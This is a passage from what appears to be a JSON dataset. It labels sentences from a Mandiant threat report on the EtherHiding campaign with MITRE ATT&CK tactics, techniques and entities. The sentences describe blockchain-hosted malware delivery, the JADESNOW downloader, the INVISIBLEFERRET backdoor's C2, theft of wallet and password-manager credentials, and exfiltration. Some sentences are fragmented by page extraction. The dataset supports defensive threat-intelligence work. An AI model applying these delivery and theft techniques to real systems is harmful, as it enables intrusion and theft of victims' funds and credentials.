"uid": "mandiant-32_mandiant_report-p7-s50-67bd33", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 50, "context_before": "Lastly, campaigns frequently leverage EtherHiding's flexible nature to update the infection chain and shift payload delivery locations.", "sentence_text": "In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Switch payload retrieval source from Ethereum to the BNB Smart Chain to fetch malware.", "entities": [ { "text": "JADESNOW", "start": 24, "end": 32, "label": "MalwareTool" }, { "text": "switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain", "start": 48, "end": 128, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p7-s51-499878", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 51, "context_before": "In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain.", "sentence_text": "This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p8-s52-f57a2a", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 8, "sentence_id": 52, "context_before": "This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.", "sentence_text": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Cloud Blog Contact sales Get started for free Ethereum Malicious Smart Contracts BNB Smart Chain and Ethereum are both designed to run decentralized applications (dApps) and smart contracts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p8-s53-2387ff", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 8, "sentence_id": 53, "context_before": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Cloud Blog Contact sales Get started for free Ethereum Malicious Smart Contracts BNB Smart Chain and Ethereum are both designed to run decentralized applications (dApps) and smart contracts.", "sentence_text": "Smart contracts are compiled into bytecode and uploaded to the blockchain, making them publicly available to be disassembled for analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p8-s54-16f3bb", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 8, "sentence_id": 54, "context_before": "Smart contracts are compiled into bytecode and uploaded to the blockchain, making them publicly available to be disassembled for analysis.", "sentence_text": "Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding to host and serve malicious code in a manner that cannot be easily blocked.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p8-s55-d5e6aa", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 8, "sentence_id": 55, "context_before": "Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding to host and serve malicious code in a manner that cannot be easily blocked.", "sentence_text": "Making use of Ethereum and BNB Smart Chain for the purpose of EtherHiding is straightforward since it simply involves calling a custom smart contract on the blockchain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p8-s57-1e9cf9", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 8, "sentence_id": 57, "context_before": "UNC5342’s", "sentence_text": "interactions with the blockchain networks are done through centralized API service providers rather than Remote Procedure Call (RPC) endpoints, as seen with", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p9-s58-471199", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 9, "sentence_id": 58, "context_before": "interactions with the blockchain networks are done through centralized API service providers rather than Remote Procedure Call (RPC) endpoints, as seen with", "sentence_text": "This indifference and lack of collaboration is a significant concern, as it increases the risk of this technique proliferating among threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p9-s59-0415e3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 9, "sentence_id": 59, "context_before": "This indifference and lack of collaboration is a significant concern, as it increases the risk of this technique proliferating among threat actors.", "sentence_text": "the smart contract from the transaction history.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p9-s60-313ab0", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 9, "sentence_id": 60, "context_before": "the smart contract from the transaction history.", "sentence_text": "The transaction details show that the contract has been updated over 20 times within the first four months, with each update costing an average of $1.37 USD in gas fees.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p9-s61-e72ab2", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 9, "sentence_id": 61, "context_before": "The transaction details show that the contract has been updated over 20 times within the first four months, with each update costing an average of $1.37 USD in gas fees.", "sentence_text": "The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p9-s62-3b67bc", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 9, "sentence_id": 62, "context_before": "The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration.", "sentence_text": "This smart contract has also been linked to a software supply chain attack that impacted React Native Aria and GlueStack via compromised npm packages in June 2025 { timestamp: 1738949853, transactionHash: \"0x5c77567fcf00c317b8156df8e tokenInfo: { address: \"0x8eac3198dd72f3e07108c4c7cff43 (...) owner: \"0x9bc1355344b54dedf3e44296916ed15 (...) txsCount: 22, (...)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p10-s63-a8497c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 10, "sentence_id": 63, "context_before": "This smart contract has also been linked to a software supply chain attack that impacted React Native Aria and GlueStack via compromised npm packages in June 2025 { timestamp: 1738949853, transactionHash: \"0x5c77567fcf00c317b8156df8e tokenInfo: { address: \"0x8eac3198dd72f3e07108c4c7cff43 (...) owner: \"0x9bc1355344b54dedf3e44296916ed15 (...) txsCount: 22, (...)", "sentence_text": "0x5c77567fcf00c317b8156df8e00838105f16fdd4fbbc6cd83d624225397d8856\nwhere the Data field contains a Base64-encoded and XOR-encrypted message.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p10-s64-1dd12a", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 10, "sentence_id": 64, "context_before": "0x5c77567fcf00c317b8156df8e00838105f16fdd4fbbc6cd83d624225397d8856\nwhere the Data field contains a Base64-encoded and XOR-encrypted message.", "sentence_text": "This message decrypts to a heavily obfuscated JavaScript payload that GTIG assesses as the second-stage downloader, JADESNOW.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p10-s65-0e7979", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 10, "sentence_id": 65, "context_before": "This message decrypts to a heavily obfuscated JavaScript payload that GTIG assesses as the second-stage downloader, JADESNOW.", "sentence_text": "In this case, the obfuscated payload is run in memory and decrypts an array of strings that combine to form API calls to different transaction hashes on Ethereum.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Execute obfuscated payload in memory and decrypt strings to construct API calls to transaction hashes.", "entities": [ { "text": "run in memory and decrypts an array of strings that combine to form API calls to different transaction hashes on Ethereum", "start": 40, "end": 161, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p10-s66-70a20d", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 10, "sentence_id": 66, "context_before": "In this case, the obfuscated payload is run in memory and decrypts an array of strings that combine to form API calls to different transaction hashes on Ethereum.", "sentence_text": "This pivot to a different", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p11-s67-426594", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 11, "sentence_id": 67, "context_before": "This pivot to a different", "sentence_text": "The attackers are not using an Cloud Blog Contact sales Get started for free Ethereum smart contract to store the payload; instead, they perform a GET request to query the transaction history of their attacker-controlled address and read the calldata stored from transactions made to the well- known “burn” address 0x00…dEaD .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Perform GET request to query transaction history from attacker-controlled address and read calldata to retrieve payload.", "entities": [ { "text": "perform a GET request to query the transaction history of their attacker-controlled address and read the calldata stored from transactions made to the well- known “burn” address 0x00…dEaD", "start": 137, "end": 324, "label": "Action" }, { "text": "0x00…dEaD", "start": 315, "end": 324, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p11-s68-f593ea", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 11, "sentence_id": 68, "context_before": "The attackers are not using an Cloud Blog Contact sales Get started for free Ethereum smart contract to store the payload; instead, they perform a GET request to query the transaction history of their attacker-controlled address and read the calldata stored from transactions made to the well- known “burn” address 0x00…dEaD .", "sentence_text": "The final address of these transactions is inconsequential since the malware only reads the data stored in the details of a transaction, effectively using the blockchain transaction as a Dead Drop Resolver.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Read data stored in blockchain transaction details to retrieve payload using a dead drop mechanism.", "entities": [ { "text": "reads the data stored in the details of a transaction, effectively using the blockchain transaction as a Dead Drop Resolver", "start": 82, "end": 205, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p11-s69-6cd32f", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 11, "sentence_id": 69, "context_before": "The final address of these transactions is inconsequential since the malware only reads the data stored in the details of a transaction, effectively using the blockchain transaction as a Dead Drop Resolver.", "sentence_text": "These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p11-s70-5d2d25", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 11, "sentence_id": 70, "context_before": "These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.", "sentence_text": "The in-memory payload fetches and evaluates the information stored on-chain by querying Ethereum via different blockchain explorer APIs.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Fetch and evaluate data from blockchain by querying Ethereum through APIs.", "entities": [ { "text": "fetches and evaluates the information stored on-chain by querying Ethereum via different blockchain explorer APIs", "start": 22, "end": 135, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p11-s71-f4ef67", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 11, "sentence_id": 71, "context_before": "The in-memory payload fetches and evaluates the information stored on-chain by querying Ethereum via different blockchain explorer APIs.", "sentence_text": "Payload Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p12-s72-4c9c9b", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 72, "context_before": "Payload Analysis", "sentence_text": "The third stage is the INVISIBLEFERRET.JAVASCRIPT Cloud Blog Contact sales Get started for free payload stored at the Ethereum transaction address 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p12-s73-eaad04", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 73, "context_before": "The third stage is the INVISIBLEFERRET.JAVASCRIPT Cloud Blog Contact sales Get started for free payload stored at the Ethereum transaction address 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a", "sentence_text": "This payload connects to the C2 server via port 3306, the default port for MySQL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Connect to a command and control server via port 3306.", "entities": [ { "text": "connects to the C2 server via port 3306", "start": 13, "end": 52, "label": "Action" }, { "text": "C2 server", "start": 29, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "port 3306", "start": 43, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p12-s74-fe2f1d", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 74, "context_before": "This payload connects to the C2 server via port 3306, the default port for MySQL.", "sentence_text": "The backdoor proceeds to run in the background, listening for incoming commands to the C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Run backdoor in the background to receive commands from a command and control server.", "entities": [ { "text": "run in the background, listening for incoming commands to the C2", "start": 25, "end": 89, "label": "Action" }, { "text": "C2", "start": 87, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p12-s75-33d99b", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 75, "context_before": "The backdoor proceeds to run in the background, listening for incoming commands to the C2.", "sentence_text": "The INVISIBLEFERRET.JAVASCRIPT payload may also be split into different components like is done at the transaction address 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f The split up JavaScript payload executes the INVISIBLEFERRET.JAVASCRIPT backdoor and attempts to install a portable Python interpreter to execute an additional credential stealer component stored at the transaction address 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Execute INVISIBLEFERRET backdoor and install a Python interpreter to run a credential stealer component.", "entities": [ { "text": "INVISIBLEFERRET.JAVASCRIPT", "start": 4, "end": 30, "label": "MalwareTool" }, { "text": "executes the INVISIBLEFERRET.JAVASCRIPT backdoor and attempts to install a portable Python interpreter to execute an additional credential stealer component", "start": 222, "end": 378, "label": "Action" }, { "text": "0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f", "start": 123, "end": 189, "label": "Infrastructure_Indicator" }, { "text": "0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41", "start": 413, "end": 479, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p12-s76-c9242b", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 76, "context_before": "The INVISIBLEFERRET.JAVASCRIPT payload may also be split into different components like is done at the transaction address 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f The split up JavaScript payload executes the INVISIBLEFERRET.JAVASCRIPT backdoor and attempts to install a portable Python interpreter to execute an additional credential stealer component stored at the transaction address 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41", "sentence_text": "The INVISIBLEFERRET.JAVASCRIPT credential stealer component also targets cryptocurrency wallets like MetaMask and Phantom, as well as credentials from other sensitive applications like password managers (e.g., 1Password).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Target cryptocurrency wallets and password managers to steal credentials.", "entities": [ { "text": "INVISIBLEFERRET.JAVASCRIPT", "start": 4, "end": 30, "label": "MalwareTool" }, { "text": "targets cryptocurrency wallets like MetaMask and Phantom, as well as credentials from other sensitive applications like password managers", "start": 65, "end": 202, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p12-s77-95eb02", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 77, "context_before": "The INVISIBLEFERRET.JAVASCRIPT credential stealer component also targets cryptocurrency wallets like MetaMask and Phantom, as well as credentials from other sensitive applications like password managers (e.g., 1Password).", "sentence_text": "The data is compressed into a ZIP archive and uploaded to an attacker-controlled remote server and a private Telegram chat.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Compress collected data into a ZIP archive and upload it to an attacker-controlled server and Telegram.", "entities": [ { "text": "compressed into a ZIP archive and uploaded to an attacker-controlled remote server and a private Telegram chat", "start": 12, "end": 122, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p12-s78-9104e5", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 12, "sentence_id": 78, "context_before": "The data is compressed into a ZIP archive and uploaded to an attacker-controlled remote server and a private Telegram chat.", "sentence_text": "The Centralized Dependencies in EtherHiding", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s79-bb30e3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 79, "context_before": "The Centralized Dependencies in EtherHiding", "sentence_text": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Decentralization is a core tenet of blockchain networks and Cloud Blog Contact sales Get started for free other Web3 technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s80-94d9a3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 80, "context_before": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Decentralization is a core tenet of blockchain networks and Cloud Blog Contact sales Get started for free other Web3 technologies.", "sentence_text": "Though blockchains like BNB Smart Chain are immutable and permissionless and the smart contracts deployed onto such blockchains cannot be removed, operations by threat actors using these blockchains are not unstoppable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s81-188fe2", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 81, "context_before": "Though blockchains like BNB Smart Chain are immutable and permissionless and the smart contracts deployed onto such blockchains cannot be removed, operations by threat actors using these blockchains are not unstoppable.", "sentence_text": "Neither North Korea’s UNC5342 nor threat actor UNC5142 are interacting directly with BNB Smart Chain when retrieving information from smart contracts; both threat actors are utilizing centralized services, akin to using traditional Web2 services such as web hosting.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Retrieve information from smart contracts by utilizing centralized services instead of direct blockchain interaction.", "entities": [ { "text": "retrieving information from smart contracts; both threat actors are utilizing centralized services", "start": 106, "end": 204, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p13-s82-4ce49e", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 82, "context_before": "Neither North Korea’s UNC5342 nor threat actor UNC5142 are interacting directly with BNB Smart Chain when retrieving information from smart contracts; both threat actors are utilizing centralized services, akin to using traditional Web2 services such as web hosting.", "sentence_text": "This affords astute defenders the opportunity to mitigate such threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s83-5448d6", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 83, "context_before": "This affords astute defenders the opportunity to mitigate such threats.", "sentence_text": "In other words, UNC5142 and UNC5342 are using permissioned services to interact with permissionless blockchains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s84-f9403e", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 84, "context_before": "In other words, UNC5142 and UNC5342 are using permissioned services to interact with permissionless blockchains.", "sentence_text": "These threat actors exhibit two different approaches to utilizing centralized services for interfacing with blockchain networks:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s85-543c39", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 85, "context_before": "These threat actors exhibit two different approaches to utilizing centralized services for interfacing with blockchain networks:\n1.", "sentence_text": "An RPC endpoint is used by UNC5142 (CLEARFAKE) in the EtherHiding activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s86-d4c955", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 86, "context_before": "An RPC endpoint is used by UNC5142 (CLEARFAKE) in the EtherHiding activity.", "sentence_text": "This allows direct communication with a BNB Smart Chain node hosted by a third party in a manner that is close to a blockchain node’s “native tongue.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s87-031731", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 87, "context_before": "This allows direct communication with a BNB Smart Chain node hosted by a third party in a manner that is close to a blockchain node’s “native tongue.”", "sentence_text": "An API service hosted by a central entity is used by UNC5342 (DPRK), acting as a layer of abstraction between the threat actor and the blockchain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s88-241145", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 88, "context_before": "An API service hosted by a central entity is used by UNC5342 (DPRK), acting as a layer of abstraction between the threat actor and the blockchain.", "sentence_text": "Though the difference is nuanced, these intermediary services are positioned to directly impact threat actor operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p13-s89-ccedef", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 13, "sentence_id": 89, "context_before": "Though the difference is nuanced, these intermediary services are positioned to directly impact threat actor operations.", "sentence_text": "Another approach not observed in these operations is to operate a node that integrates fully with", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p14-s90-f8d301", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 14, "sentence_id": 90, "context_before": "Another approach not observed in these operations is to operate a node that integrates fully with", "sentence_text": "Recommendations\nEtherHiding presents new challenges as traditional campaigns have usually been halted by blocking known domains and IPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p14-s91-067254", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 14, "sentence_id": 91, "context_before": "Recommendations\nEtherHiding presents new challenges as traditional campaigns have usually been halted by blocking known domains and IPs.", "sentence_text": "Malware authors may leverage the blockchain to perform further malware propagation stages since smart contracts operate autonomously and cannot be shut down.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p14-s92-e34e98", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 14, "sentence_id": 92, "context_before": "Malware authors may leverage the blockchain to perform further malware propagation stages since smart contracts operate autonomously and cannot be shut down.", "sentence_text": "While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), malicious activity can still be performed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p14-s93-e6cbf4", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 14, "sentence_id": 93, "context_before": "While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), malicious activity can still be performed.", "sentence_text": "Chrome Enterprise: Centralized Mitigation Chrome Enterprise can be a powerful tool to prevent the impact of EtherHiding by using its centralized management capabilities to enforce policies that directly disrupt the attack chain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p14-s94-6666d7", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 14, "sentence_id": 94, "context_before": "Chrome Enterprise: Centralized Mitigation Chrome Enterprise can be a powerful tool to prevent the impact of EtherHiding by using its centralized management capabilities to enforce policies that directly disrupt the attack chain.", "sentence_text": "This approach shifts security away from", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s95-997511", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 95, "context_before": "This approach shifts security away from", "sentence_text": "The core strength of Chrome Enterprise resides in Chrome Browser Cloud Management.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s96-ec0694", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 96, "context_before": "The core strength of Chrome Enterprise resides in Chrome Browser Cloud Management.", "sentence_text": "This platform allows administrators to configure and enforce security policies across all managed browsers in their organization, ensuring consistent protection regardless of the user's location or device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s97-3d428a", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 97, "context_before": "This platform allows administrators to configure and enforce security policies across all managed browsers in their organization, ensuring consistent protection regardless of the user's location or device.", "sentence_text": "For EtherHiding, this means an administrator can deploy a defense strategy that does not rely on individual users making the right security decisions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s98-0f625f", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 98, "context_before": "For EtherHiding, this means an administrator can deploy a defense strategy that does not rely on individual users making the right security decisions.", "sentence_text": "Key Prevention Policies and Strategies An administrator can use specific policies to break the EtherHiding attack at multiple points:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s99-2e5f35", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 99, "context_before": "Key Prevention Policies and Strategies An administrator can use specific policies to break the EtherHiding attack at multiple points:\n1.", "sentence_text": "Block Malicious Downloads", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s100-910d30", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 100, "context_before": "Block Malicious Downloads", "sentence_text": "This is the most direct and effective way to stop the attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s101-6083c1", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 101, "context_before": "This is the most direct and effective way to stop the attack.", "sentence_text": "The final step of an EtherHiding campaign requires the user to download and run a malicious file (e.g., from a fake update prompt).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s102-a99bd7", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 102, "context_before": "The final step of an EtherHiding campaign requires the user to download and run a malicious file (e.g., from a fake update prompt).", "sentence_text": "Chrome Enterprise can prevent this entirely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p15-s103-d0a726", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 15, "sentence_id": 103, "context_before": "Chrome Enterprise can prevent this entirely.", "sentence_text": "DownloadRestrictions Policy: An admin can configure this policy to block downloads of dangerous file types.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s104-78aa43", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 104, "context_before": "DownloadRestrictions Policy: An admin can configure this policy to block downloads of dangerous file types.", "sentence_text": "Automate and Manage Browser Updates Cloud Blog Contact sales Get started for free EtherHiding heavily relies on social engineering, most notably by using a pop-up that tells the user \"Your Chrome is out of date.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s105-d61bd9", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 105, "context_before": "Automate and Manage Browser Updates Cloud Blog Contact sales Get started for free EtherHiding heavily relies on social engineering, most notably by using a pop-up that tells the user \"Your Chrome is out of date.\"", "sentence_text": "In a managed enterprise environment, this should be an immediate red flag.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p16-s106-d05c87", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 16, "sentence_id": 106, "context_before": "In a managed enterprise environment, this should be an immediate red flag.", "sentence_text": "Managed Updates: Administrators use Chrome Enterprise to control and automate browser updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, 